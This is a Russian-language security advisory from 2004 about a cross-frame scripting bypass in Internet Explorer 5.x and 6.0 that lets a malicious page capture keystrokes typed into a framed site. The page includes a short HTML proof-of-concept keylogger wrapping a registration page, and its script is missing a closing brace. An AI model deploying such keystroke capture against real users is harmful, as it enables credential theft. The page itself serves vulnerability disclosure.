Утечка нажатых клавиш между фреймами в Microsoft Internet Explorer (IE)

Дата публикации:
29.02.2004
Всего просмотров:
1509
Опасность:
Низкая
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Уязвимые версии: Microsoft Internet Explorer (IE) 5.х, 6.0

Описание: Кросс доменная уязвимость обнаружена в Microsoft Internet Explorer. Удаленный пользователь может контролировать нажатие клавиш целевым пользователем внутри frameset.

Удаленный пользователь может сконструировать HTML, который, когда будет загружен целевым пользователем, обойдет ограничения, наложенные на перекрестные сценарии фреймов.

В результате удаленный пользователь может сконструировать злонамеренный HMTL, который будет может контролировать нажатие клавиш целевым пользователем в целевом frameset.

Пример/Эксплоит:

<html>
<head><title>IE Cross Frame Scripting Restriction Bypass Example</title>
<script>
var keylog='';
document.onkeypress = function () {
    k = window.event.keyCode;
    window.status = keylog += String.fromCharCode(k) + '[' + k +']';
 
</script>
</head>
<frameset onLoad="this.focus();" onBlur="this.focus();" cols="100%,*">
<frame src="http://www.idefense.com/register.jsp" scrolling="auto">
</frameset>
</html>

URL производителя: http://www.microsoft.com/technet/security/

Решение: Microsoft не считает обнаруженную проблему уязвимостью.

Ссылки: iDEFENSE Security Advisory 02.27.04b: Microsoft Internet Explorer

или введите имя

CAPTCHA